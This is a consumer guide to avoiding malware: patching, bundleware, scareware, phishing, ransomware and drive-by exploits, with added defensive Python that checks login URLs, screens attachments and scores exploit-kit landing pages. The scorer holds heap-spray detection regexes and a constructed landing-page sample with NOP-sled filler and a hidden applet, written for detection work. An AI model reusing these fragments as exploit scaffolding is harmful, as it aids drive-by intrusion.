Reducing Your Risk:
While these recommendations are no guarantee of a malware-free computer, they should help to reduce your risk. There is really no reason why your computer cannot stay malware free. No amount or combination of security software will help you if you fail to practice some precautions. Software can't think for you.
It makes no difference what the malware is, either. The methods of "infection" are the same for any malware, and knowing these methods will help you avoid it.
Instead of piling on all kinds of software to protect against this and that, or asking what the best antivirus is:
- Develop and practice good computing habits.
- It is essential that you keep Windows up to date. Why?
Exploits rely on outdated/unpatched software in order to be successful. More about exploits below.
Visit Windows Update on a regular basis or use the Windows auto-update feature: XP/Vista/W7/W8/W10 all have features built-in that will download updates for you. Use the auto-update features available in most other software.
It is essential that you keep your browsers up to date. Why?
Because updates patch known vulnerabilities that could otherwise be exploited to install malware on your computer.
A browser can be a target for executing malicious code remotely. A specially crafted web page is all that is needed.
Staying updated is also essential for web-based applications like Java, Adobe Flash/Reader, iTunes, media players, browser plug-ins and add-ons. Malware attacks increasingly use exploits in web-based applications.
Not sure if your software is up to date? Install the free Secunia PSI which will identify, download and install updates for thousands of different programs.
Heimdal Free will also scan for and update popular software.
Check your browser then follow the recommended actions with: Qualys BrowserCheck
Download portals also have many confusing green download buttons which are just links to other software.
Even legitimate popular software can have options to install useless toolbars or other garbage offers. The defaults to install these are already checked for you. The installer could:
- Change your start page or default search engine
- Offer other software to install
- Display ads
- Add shortcuts to your desktop
- Open your browser to make other offers or recommendations
Even legitimate software can request to install extras or make changes. Below, an install of Panda Free Antivirus wants to install a toolbar and change settings. Note the options are already checked for you.
Be aware that any software could come with optional offers to install more software. Choose the custom installation or uncheck/cancel any offers for additional software to be installed. These types of installs are easily avoided if you pay attention.

Pay attention, or get your software from other sites that don't bury the links, display several download buttons or use wrappers/installers that offer other garbage software. A short article about software wrappers and why you should avoid them is here and here.
The other lesson here is to get your software from the provider's website and not a download portal. You can also find alternatives to any software. If you use these types of download portals you should pay careful attention to what "extras" you could be installing. Below are good examples of PUPs (Potentially Unwanted Programs). These can be downloaded outright, come bundled with other software, or display as popups on web pages.
Below are the installed PUP icons on the desktop and the annoying screens that tend to pop up at random times.
The only good thing about this software is that it's easily removed.


More massive confusion below: this is the web page for Imgburn, which is actually very useful software. Too bad I can't find the download link.
There are no installers or add-ons offered with this software.
It's just a confusing mess of other offers and download buttons. There are four in the screenshot below and not one will download Imgburn.
You'd think number 3, the link that says "download Imgburn", is it?


- Read the EULA
- Uncheck offers to change your start page or default search engine
- Uncheck offers for additional or "recommended" software
- Use the custom install option.
Clean sites that do not use installers/wrappers:
MajorGeeks
Softpedia
Snapfiles
FileForum
Keep your browser updated. Keep all extensions and add-ons updated. Keep Java and Flash up to date, or consider removing them altogether.
Examples of malicious web page messages that will install adware or malware:




A rather new twist on the scareware theme is to display a fake problem/message with a phone number to call for "help." Below are scary-looking warnings from malicious web pages. As you can see, many different variations are possible.
One thing they all have in common, other than some computer problem, is a phone number.
Do not call for any reason. Once again, these come in many different scary messages and languages. This way they get your personal information and money even faster, on the phone: no forms to fill out or software to buy.
Also beware of unsolicited E-mails and personal phone calls that want to help you with any type of computer problem. Just more scamming.



Think twice about using any login credentials on the internet unless you are sure of the web site. Many sites now offer to let you log in with your existing Gmail, Facebook, Yahoo accounts etc. A scam site could easily just be capturing login credentials.


Hopefully users know not to click on E-mail attachments or links no matter how convincing or urgent the message may seem. Use plain text for viewing E-mail, never respond to unsolicited E-mails, and never click on links/files or call a phone number that may be provided.
Treat your E-mail address like personal information and be careful who you share it with. The amount of junk E-mail you receive is directly related to how your E-mail address has been exposed over time.
Below is a fake PayPal site harvesting login credentials. Hopefully you didn't take the E-mail bait and click that link to log in to your account.
How to identify: Phishing
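One of the checks behind "is this really the site I think it is" can be automated. The following is an added example, not code from the original article: it takes a URL that presents a login form and reports red flags such as a brand name appearing on a domain the brand does not own (the fake-PayPal pattern above), a plain-http login page, or digits standing in for letters. The EXPECTED domain list and the sample URLs are constructed for illustration, and the two-label "registrable domain" shortcut is an assumption that only holds for simple suffixes like .com.

```python
"""Red-flag a login-page URL that does not belong to the site it imitates."""
from urllib.parse import urlsplit

# Brands the user logs in to, mapped to the registrable domain that really
# serves their login pages. Constructed list; extend to taste.
EXPECTED = {
    "paypal": "paypal.com",
    "gmail": "google.com",
    "facebook": "facebook.com",
}

# Digits commonly swapped for letters in lookalike names (1->l, 0->o, ...).
LOOKALIKES = str.maketrans("10345", "loeas")


def normalize(text: str) -> str:
    """Lowercase and undo simple digit-for-letter substitutions."""
    return text.lower().translate(LOOKALIKES)


def registrable_domain(host: str) -> str:
    """Return the last two labels ('login.paypal.com' -> 'paypal.com').
    Assumption: good enough for .com-style suffixes; a production check
    would consult the Public Suffix List for multi-label suffixes."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def assess_login_url(url: str) -> list[str]:
    """Return the red flags raised by a URL that shows a login form.
    An empty list means nothing fired; it is not proof of legitimacy."""
    flags = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.scheme != "https":
        flags.append("login form not served over https")
    if "@" in parts.netloc:
        # 'https://www.paypal.com@evil.example/' really goes to evil.example
        flags.append("userinfo in URL hides the real host")
    if host and host.replace(".", "").isdigit():
        flags.append("bare IP address instead of a hostname")
    if host.startswith("xn--") or ".xn--" in host:
        flags.append("punycode (internationalised) hostname")
    reg = registrable_domain(host)
    for brand, legit in EXPECTED.items():
        # Brand name shows up somewhere (subdomain, path, lookalike spelling)
        # but the domain that actually owns the page is not the brand's own.
        if brand in normalize(url) and reg != legit:
            flags.append(f"mentions {brand} but is hosted on {reg}")
    return flags
```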
Below is an E-mail attachment labeled "Purchase Order". It has a PDF-like icon and a screensaver (.scr) extension. When opened, it installs the Zbot trojan on your computer; the ahuc.exe process is shown below.


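The "Purchase Order" attachment above is dangerous because the name and icon say document while the extension says program. This added example (not code from the original article) screens an attachment by its file name and by its first bytes, flagging executable and double extensions and a mismatch between what the name claims and what the content is. The extension lists, magic-byte table, and sample inputs are constructed for illustration.

```python
"""Screen an e-mail attachment by name and by content before it is opened."""
import os

# Extensions Windows will run on double-click, however the icon looks.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js",
                   ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".msi", ".lnk"}
# Extensions a user reads as harmless documents or pictures.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}

# Leading bytes of a few well-known formats; PE executables start with "MZ".
MAGIC = {
    b"MZ": "Windows executable",
    b"%PDF": "PDF document",
    b"\xff\xd8\xff": "JPEG image",
    b"\x89PNG": "PNG image",
}


def sniff(head: bytes) -> str:
    """Identify a file type from its first bytes, ignoring the name."""
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    return "unknown"


def screen_attachment(filename: str, head: bytes) -> list[str]:
    """Return the red flags for an attachment given its name and first bytes.
    An empty list means nothing fired, not that the file is safe."""
    flags = []
    base, ext = os.path.splitext(filename.strip())
    ext = ext.lower()
    inner_ext = os.path.splitext(base)[1].lower()   # e.g. '.pdf' in 'x.pdf.scr'
    if ext in EXECUTABLE_EXTS:
        flags.append(f"executable extension {ext}")
    if inner_ext in DOCUMENT_EXTS and ext in EXECUTABLE_EXTS:
        flags.append(f"double extension: looks like {inner_ext}, runs as {ext}")
    kind = sniff(head)
    if kind == "Windows executable" and ext not in EXECUTABLE_EXTS:
        # The name says picture/document, the bytes say program.
        flags.append(f"content is a Windows executable but name says {ext or 'no extension'}")
    return flags


# Constructed samples: only the first bytes matter to the screen.
SAMPLES = {
    "Purchase Order.pdf.scr": b"MZ\x90\x00\x03\x00",   # PE header behind a PDF-looking name
    "invoice.pdf": b"%PDF-1.4\n",                       # genuine PDF
    "summer.jpg": b"MZ\x90\x00",                        # executable disguised as a picture
}

if __name__ == "__main__":
    for name, head in SAMPLES.items():
        print(name, "->", screen_attachment(name, head) or "no flags")
```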
P2P networks are very popular for distributing malicious files. A file could be nothing but malware or have malware bundled in it. Do you really trust the source? If you use P2P file sharing you will most likely encounter malware at some point.
Social sites are a target not just for distributing malware but also for gathering massive amounts of basic public information that could lead to social engineering attacks against individuals.
Facebook, LinkedIn etc. are like phone books for gathering public information. Enough information could be gathered just to guess potential passwords.
Warez, cracks and keygens are very popular for carrying malware payloads. If you look for and install these you will also encounter malware.
Don't use P2P, cracks or keygens, and stay off the social grid.
Antivirus and Malware removing software:
If either of these frequently finds malware, then it's time to seriously review your computer habits, or lack of habits.
One antivirus and one or two anti-malware programs.
Software Firewalls:
Malware these days can just bypass the firewall by using an already existing connection, or by launching and using other Windows components.
Software firewalls can also have steep learning curves and put up complicated prompts where the user has to decide whether to allow or deny the process, and make the right choice.
Windows Firewall in its default setting is sufficient. Most people also have hardware routers to use multiple devices. A NAT router adds another layer of security.
Use the Windows native firewall and get an inexpensive NAT hardware router.
A limited account is one with lesser privileges. "This will offer some protection or limit the impact from malware." This is exactly what UAC (User Account Control) in Windows 7, 8 and 10 attempts to address.
Every Microsoft remote code execution bulletin ends with this sentence: "Users whose accounts are configured to have fewer rights on the system could be less impacted than users who operate with administrative user rights." Impacted is referring to malware, fewer rights to limited accounts.
Set up limited accounts to access the internet. Use Windows UAC.
Passwords:
Using the same password for all accounts means that if access is gained to one, then all accounts can be easily compromised.
Never use personal or any identifying information in a password. No dictionary words, pet names etc.
What's a strong password?
How can I remember them all? Password managers will create strong passwords, store and encrypt the database and automatically populate the login fields for you. Free password managers. I use the open-source KeePass.
If a service offers two-factor authentication, use it. It provides an extra confirmation layer that it's really you logging in to your account and not an attacker.
Normally all you provide is a user name and password. With 2FA the website, say your bank, would send you a unique one-time code via E-mail or text that you would also have to enter on the site before getting into your account.
BackUps:
Best free drive backup software for Windows.
This would be content you created like documents, photos, video etc. It's really a "just in case," be it hard drive failure or a computer that has to be reformatted due to malware.
The operating system and software can always be restored.
Any content you created would be lost unless you have a backup.
It makes no difference what type of malware it is. You can get them all the same way. Ransomware was big news in the press, but the methods of infection are the same for any malware.
Examples of Scareware, Ransomware and Ransomware with Encryption:
These pop-ups below (aka scareware) may look like real Windows messages and icons but they are not. One way this fake software can get installed is by clicking pop-up messages on the internet like those above, by visiting or getting redirected to malicious sites, by clicking links in E-mail, etc.
You may be prompted to install software, or a fake scan of your computer may take place and you are prompted to download and install the scareware. Scareware can have similar-sounding names and looks just like legitimate software. Only the look and name change.
Once installed it will bombard you with annoying balloon messages like below and provide constant prompts to register or activate the fraudulent scareware. At the least, this type of malware is easily recognized.



Another twist on the scareware theme is ransomware. Basically your computer is held "hostage" until you transfer money for an "unlock" code. Every time you boot up, your screen will be plastered in full-screen mode with some threatening or embarrassing message accusing you of something illegal, and now you have been "caught." Time to cough up some money to make it all better.
Available in several languages and variations, just like scareware.
Complete with instructions for you to follow.
In some cases files cannot be recovered without paying the ransom.
- The best defense for this and any malware really is to back up your data on a regular basis.
One of the first things the newer versions of file encrypters do is delete your system restore points, so you're out of luck restoring to an earlier time:



Locky ransomware, Feb 2016. Files of many extensions are encrypted and payment (ransom) must be made for decryption. Yet one more reason to back up your files.


Yet another variation doesn't really encrypt your files but rather deletes files of certain extensions.

Exploits: (the silent install)
It's also not necessary to actually visit a malicious page; you could get redirected to one by clicking links in E-mails, blogs, malicious ads, social sites etc.
Even legitimate popular sites can unknowingly host malicious code that silently installs malware in the background, until it's noticed, of course.
Below is heavily edited raw HTTP traffic from a malicious web site set up just to install malware.
In the background the site checks my OS, browser, browser plugins and their versions, then gets the appropriate exploit based on this information.
I believe this exploit took advantage of the year-old Flash Player plugin in my browser.
The malicious JavaScript or Flash is loaded in the browser, the exploit runs and executes the shellcode: for example, a buffer overflow against the vulnerability. In this case the exploit was directed at my year-old Adobe Flash Player browser plugin. A malicious file was then successfully downloaded and executed on my machine. All in the background, without any input from me.
This is one way that malware can seem to appear out of nowhere. One minute you're fine, the next minute you have a new icon by the clock or your files are encrypted.
Disable Java and Flash in your browser or uninstall them. Your browser will function fine without them. At the very least, keep them updated.
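The landing-page behaviour described above (fingerprint the browser and plugins, load a hidden Flash object or Java applet, then run shellcode) leaves static traces in the HTML that a proxy or mail gateway can look for. The following is an added example, not code from the original article or from any security product: a small weighted indicator scorer run over a constructed sample page modelled on the features the author's capture shows (a PluginDetect library, a 10x10 Flash object, an applet loaded from a .php URL, a '%u' string split to hide heap-spray fill bytes, a long setTimeout redirect). The weights and the threshold are a constructed heuristic.

```python
"""Score HTML for features typical of an exploit-kit landing page."""
import re

# (description, pattern, weight). Weights are a constructed heuristic.
INDICATORS = [
    ("plugin fingerprinting library",
     re.compile(r"PluginDetect", re.I), 3),
    ("java applet whose archive is a server-side script",
     re.compile(r"<applet[^>]+archive=['\"][^'\"]*\.php", re.I), 3),
    ("flash object sized to be invisible",
     re.compile(r"x-shockwave-flash[^>]*(width|height)=['\"]?\d{1,2}(?!\d)['\"]?", re.I), 2),
    ("run of unicode-escaped bytes (shellcode or heap spray)",
     re.compile(r"(%u[0-9a-f]{4}){4,}", re.I), 4),
    ("'%u' string split to hide heap-spray fill bytes",
     re.compile(r"['\"]%u['\"]\s*\+\s*['\"][0-9a-f]{4}['\"]", re.I), 3),
    ("unescape() of escaped string",
     re.compile(r"unescape\s*\(", re.I), 1),
    ("redirect delayed by many seconds (time for the exploit to run)",
     re.compile(r"setTimeout\s*\(\s*[^,()]+,\s*\d{4,}\s*\)", re.I), 1),
]

SUSPICIOUS_THRESHOLD = 6


def score_page(html: str) -> tuple[int, list[str]]:
    """Return (total weight, descriptions of the indicators that matched)."""
    hits = [(desc, weight) for desc, rx, weight in INDICATORS if rx.search(html)]
    return sum(w for _, w in hits), [d for d, _ in hits]


def is_suspicious(html: str, threshold: int = SUSPICIOUS_THRESHOLD) -> bool:
    """True when the combined indicator weight reaches the threshold."""
    return score_page(html)[0] >= threshold


# Constructed sample landing page: mimics the captured page's structure,
# with filler bytes in place of any real shellcode.
SAMPLE_LANDING = """<html><body><applet archive="/kit.php" code="hw"></applet>
<script>PluginDetect.getVersion("Flash");var f='%u'+'0c0c';
var sc=unescape(f+f+"%u9090%u9090%u9090%u9090");
document.write("<embed type='application/x-shockwave-flash' src='/x.swf' width='10' height='10'>");
setTimeout(go,61000);</script></body></html>"""

# Constructed benign page: a small image is not a hidden Flash object.
SAMPLE_BENIGN = "<html><body><h1>Hello</h1><img src='a.png' width='10'></body></html>"

if __name__ == "__main__":
    total, matched = score_page(SAMPLE_LANDING)
    print(total, matched)
    print(score_page(SAMPLE_BENIGN))
```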
This is what the actual malicious page might display, while all the checking, downloading and installing goes on in the background. As you can see from the examples below, any and all types of malware are possible.





"The attack used a malicious HTML page to load the malformed MIDI file as an embedded object for the Windows Media Player browser plug-in. If successful, the exploit silently downloaded a Remote Access Trojan (RAT) on the user’s machine without the user’s knowledge." Source

Malicious URL in Media Player:

Keep software, browsers and plugins updated to prevent silent installs. Remove Java and Flash.
Two of the biggest culprits are Adobe Flash and the Java Runtime Environment. Both are used in your browser. Even if kept updated, it doesn't take long before a new vulnerability is exploited. All have a frequent exploit/patch cycle. They're really not worth the risk.
They can be uninstalled. Your browser will function fine without them. This will prevent a silent install from taking place and reduce your browser's attack surface. You can also use an ad-blocker: not only will it make for a cleaner-looking web page, it could also block a malicious ad from being launched.
Adobe Flash Player update includes 79 fixes...
Disable Flash and Java.
Disable Java


Social engineering, relying on the user, is by far the easiest way to compromise a machine.



All this goes on in the background. The file is downloaded and executed on your machine. First comes a redirection to the site hosting the file. The first file hosted at Dropbox (in red, line 23) has already been removed. It may have been malware or the video to watch? Files may not last long at some hosting sites. The first downloaded file, line 24, I believe is the malicious Java file in the prompt. The actual payload (.exe) from another site is line 25, which is downloaded and executed on your machine.
The payload, line 25. All this happens in the background. No action is needed on your part other than clicking Run in the applet prompt.
The downloaded file, bp.exe, on my desktop and a scan result of the file from Jotti. Yawn, it's another trojan. Script kiddie stuff.
Malware using legitimate software to capture keystrokes, video and screenshots, then upload them.


E-mail that arrived as a postcard; this one happens to be a picture (summer.jpg). It could be any picture. A double-click to view it displays the picture and, in the background, installs an IRC trojan.
This is not an exploit, but simply malware that's installed by a double-click on an E-mail attachment.
Server list, associated files and a response from the Budapest server in Wireshark. The IRC PONG command is an acknowledgment of a PING: a connection check.
The Process: plugin.exe and jusched

Command and Control login to direct tasks for the bot. Basically your computer is controlled remotely for various activities.

The process: dllhost.exe


RAT (remote access trojan):

Yet another backdoor:


Make sure you know what you install on your computer.


Useful Links
Free Anti-malware:
SpyBot
Superantispyware
Free Antivirus/Anti-malware:
Security Essentials
Avira
Avast
Comodo AV


A Few Help Forums:
GeeksToGo
Malwarebytes Forum
Safer-Networking
Bleeping Computer
Tech Support Guy
What The Tech

All screenshots were taken from my abused "live" malware install machine, currently running an unpatched W7.